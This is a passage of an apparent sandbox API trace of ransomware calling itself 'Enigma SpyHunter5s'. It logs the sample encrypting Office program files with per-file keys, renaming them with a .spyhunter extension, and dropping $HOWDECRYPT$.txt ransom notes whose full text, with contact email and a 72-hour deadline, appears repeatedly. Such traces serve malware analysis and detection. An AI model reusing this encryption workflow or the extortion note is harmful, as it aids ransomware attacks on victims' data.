files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0088.161] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 102 [0088.161] StrStrW (lpFirst="Proof.XML", lpSrch=".txt") returned 0x0 [0088.161] GetProcessHeap () returned 0x2c0000 [0088.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x376930 [0088.161] ReadFile (in: hFile=0x170, lpBuffer=0x376930, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fd3c, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesRead=0x270fd3c*=0x5b2, lpOverlapped=0x0) returned 1 [0088.670] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffa4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.670] WriteFile (in: hFile=0x170, lpBuffer=0x376930*, nNumberOfBytesToWrite=0x5b2, lpNumberOfBytesWritten=0x270fd3c, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesWritten=0x270fd3c*=0x5b2, lpOverlapped=0x0) returned 1 [0088.670] GetProcessHeap () returned 0x2c0000 [0088.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x376930 | out: hHeap=0x2c0000) returned 1 [0088.670] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.670] WriteFile (in: hFile=0x170, lpBuffer=0x270fd7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fd3c, lpOverlapped=0x0 | out: lpBuffer=0x270fd7c*, lpNumberOfBytesWritten=0x270fd3c*=0x4, lpOverlapped=0x0) returned 1 [0088.671] WriteFile (in: hFile=0x170, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fd3c, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x270fd3c*=0x30, lpOverlapped=0x0) returned 1 [0088.671] CloseHandle (hObject=0x170) returned 1 [0088.672] GetProcessHeap () returned 0x2c0000 [0088.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0088.673] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.spyhunter") returned 112 [0088.673] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml.spyhunter")) returned 1 [0088.785] GetProcessHeap () returned 0x2c0000 [0088.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0088.786] GetProcessHeap () returned 0x2c0000 [0088.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0088.786] GetProcessHeap () returned 0x2c0000 [0088.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3792a0 | out: hHeap=0x2c0000) returned 1 [0088.786] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0088.825] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0088.825] WriteFile (in: hFile=0xcc, lpBuffer=0x270fcb3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fddc, lpOverlapped=0x0 | out: lpBuffer=0x270fcb3*, lpNumberOfBytesWritten=0x270fddc*=0x127, lpOverlapped=0x0) returned 1 [0088.825] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0088.825] WriteFile (in: hFile=0xcc, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fddc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fddc*=0x2ac, lpOverlapped=0x0) returned 1 [0088.826] CloseHandle (hObject=0xcc) returned 1 [0088.826] GetProcessHeap () returned 0x2c0000 [0088.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x379178 | out: hHeap=0x2c0000) returned 1 [0088.826] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0088.838] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0088.838] WriteFile (in: hFile=0x178, lpBuffer=0x270fcaf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fdd8, lpOverlapped=0x0 | out: lpBuffer=0x270fcaf*, lpNumberOfBytesWritten=0x270fdd8*=0x127, lpOverlapped=0x0) returned 1 [0088.839] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0088.839] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fdd8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fdd8*=0x2ac, lpOverlapped=0x0) returned 1 [0088.839] CloseHandle (hObject=0x178) returned 1 [0088.839] GetProcessHeap () returned 0x2c0000 [0088.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37b218 | out: hHeap=0x2c0000) returned 1 [0088.839] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0088.840] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0088.840] WriteFile (in: hFile=0x178, lpBuffer=0x270fcab*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fdd4, lpOverlapped=0x0 | out: lpBuffer=0x270fcab*, lpNumberOfBytesWritten=0x270fdd4*=0x127, lpOverlapped=0x0) returned 1 [0088.840] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0088.841] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fdd4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fdd4*=0x2ac, lpOverlapped=0x0) returned 1 [0088.841] CloseHandle (hObject=0x178) returned 1 [0088.841] GetProcessHeap () returned 0x2c0000 [0088.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x385280 | out: hHeap=0x2c0000) returned 1 [0088.841] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd70 | out: pbBuffer=0x270fd70) returned 1 [0088.841] GetProcessHeap () returned 0x2c0000 [0088.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0088.841] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fd68*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fd68*=0x30) returned 1 [0088.841] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_fr.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0088.843] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX") returned 69 [0088.843] StrStrW (lpFirst="MSWDS_FR.LEX", lpSrch=".txt") returned 0x0 [0088.843] GetProcessHeap () returned 0x2c0000 [0088.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x343830 [0088.844] ReadFile (in: hFile=0x178, lpBuffer=0x343830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fd2c, lpOverlapped=0x0 | out: lpBuffer=0x343830*, lpNumberOfBytesRead=0x270fd2c*=0x2800, lpOverlapped=0x0) returned 1 [0088.845] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.845] WriteFile (in: hFile=0x178, lpBuffer=0x343830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fd2c, lpOverlapped=0x0 | out: lpBuffer=0x343830*, lpNumberOfBytesWritten=0x270fd2c*=0x2800, lpOverlapped=0x0) returned 1 [0088.845] GetProcessHeap () returned 0x2c0000 [0088.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x343830 | out: hHeap=0x2c0000) returned 1 [0088.846] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.846] WriteFile (in: hFile=0x178, lpBuffer=0x270fd6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fd2c, lpOverlapped=0x0 | out: lpBuffer=0x270fd6c*, lpNumberOfBytesWritten=0x270fd2c*=0x4, lpOverlapped=0x0) returned 1 [0089.375] WriteFile (in: hFile=0x178, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fd2c, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x270fd2c*=0x30, lpOverlapped=0x0) returned 1 [0089.375] CloseHandle (hObject=0x178) returned 1 [0089.410] GetProcessHeap () returned 0x2c0000 [0089.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0089.410] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX.spyhunter") returned 79 [0089.410] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_fr.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_fr.lex.spyhunter")) returned 1 [0089.410] GetProcessHeap () returned 0x2c0000 [0089.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340fe8 | out: hHeap=0x2c0000) returned 1 [0089.410] GetProcessHeap () returned 0x2c0000 [0089.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0089.411] GetProcessHeap () returned 0x2c0000 [0089.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37d708 | out: hHeap=0x2c0000) returned 1 [0089.411] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd70 | out: pbBuffer=0x270fd70) returned 1 [0089.411] GetProcessHeap () returned 0x2c0000 [0089.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0089.411] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fd68*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fd68*=0x30) returned 1 [0089.411] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fplace.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0089.444] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL") returned 71 [0089.445] StrStrW (lpFirst="FPLACE.DLL", lpSrch=".txt") returned 0x0 [0089.445] GetProcessHeap () returned 0x2c0000 [0089.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x37f868 [0089.445] ReadFile (in: hFile=0x16c, lpBuffer=0x37f868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fd2c, lpOverlapped=0x0 | out: lpBuffer=0x37f868*, lpNumberOfBytesRead=0x270fd2c*=0x2800, lpOverlapped=0x0) returned 1 [0089.455] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.455] WriteFile (in: hFile=0x16c, lpBuffer=0x37f868*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fd2c, lpOverlapped=0x0 | out: lpBuffer=0x37f868*, lpNumberOfBytesWritten=0x270fd2c*=0x2800, lpOverlapped=0x0) returned 1 [0089.455] GetProcessHeap () returned 0x2c0000 [0089.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37f868 | out: hHeap=0x2c0000) returned 1 [0089.455] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.455] WriteFile (in: hFile=0x16c, lpBuffer=0x270fd6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fd2c, lpOverlapped=0x0 | out: lpBuffer=0x270fd6c*, lpNumberOfBytesWritten=0x270fd2c*=0x4, lpOverlapped=0x0) returned 1 [0089.463] WriteFile (in: hFile=0x16c, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fd2c, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x270fd2c*=0x30, lpOverlapped=0x0) returned 1 [0089.464] CloseHandle (hObject=0x16c) returned 1 [0089.523] GetProcessHeap () returned 0x2c0000 [0089.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0089.523] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL.spyhunter") returned 81 [0089.524] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fplace.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fplace.dll.spyhunter")) returned 1 [0089.524] GetProcessHeap () returned 0x2c0000 [0089.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0089.524] GetProcessHeap () returned 0x2c0000 [0089.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0089.524] GetProcessHeap () returned 0x2c0000 [0089.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37d7e0 | out: hHeap=0x2c0000) returned 1 [0089.524] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0089.526] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0089.526] WriteFile (in: hFile=0x16c, lpBuffer=0x270fc9f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fdc8, lpOverlapped=0x0 | out: lpBuffer=0x270fc9f*, lpNumberOfBytesWritten=0x270fdc8*=0x127, lpOverlapped=0x0) returned 1 [0089.527] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0089.527] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fdc8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fdc8*=0x2ac, lpOverlapped=0x0) returned 1 [0089.527] CloseHandle (hObject=0x16c) returned 1 [0089.527] GetProcessHeap () returned 0x2c0000 [0089.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3299f8 | out: hHeap=0x2c0000) returned 1 [0089.527] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd68 | out: pbBuffer=0x270fd68) returned 1 [0089.527] GetProcessHeap () returned 0x2c0000 [0089.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0089.527] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fd60*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fd60*=0x30) returned 1 [0089.528] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0089.528] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE") returned 72 [0089.528] StrStrW (lpFirst="OSE.EXE", lpSrch=".txt") returned 0x0 [0089.528] GetProcessHeap () returned 0x2c0000 [0089.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x343830 [0089.528] ReadFile (in: hFile=0x16c, lpBuffer=0x343830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fd24, lpOverlapped=0x0 | out: lpBuffer=0x343830*, lpNumberOfBytesRead=0x270fd24*=0x2800, lpOverlapped=0x0) returned 1 [0089.535] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.535] WriteFile (in: hFile=0x16c, lpBuffer=0x343830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fd24, lpOverlapped=0x0 | out: lpBuffer=0x343830*, lpNumberOfBytesWritten=0x270fd24*=0x2800, lpOverlapped=0x0) returned 1 [0089.535] GetProcessHeap () returned 0x2c0000 [0089.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x343830 | out: hHeap=0x2c0000) returned 1 [0089.536] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.536] WriteFile (in: hFile=0x16c, lpBuffer=0x270fd64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fd24, lpOverlapped=0x0 | out: lpBuffer=0x270fd64*, lpNumberOfBytesWritten=0x270fd24*=0x4, lpOverlapped=0x0) returned 1 [0089.544] WriteFile (in: hFile=0x16c, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fd24, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x270fd24*=0x30, lpOverlapped=0x0) returned 1 [0089.544] CloseHandle (hObject=0x16c) returned 1 [0089.547] GetProcessHeap () returned 0x2c0000 [0089.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0089.548] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE.spyhunter") returned 82 [0089.548] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe.spyhunter")) returned 1 [0089.549] GetProcessHeap () returned 0x2c0000 [0089.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0089.549] GetProcessHeap () returned 0x2c0000 [0089.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0089.549] GetProcessHeap () returned 0x2c0000 [0089.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3858a0 | out: hHeap=0x2c0000) returned 1 [0089.549] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\smart 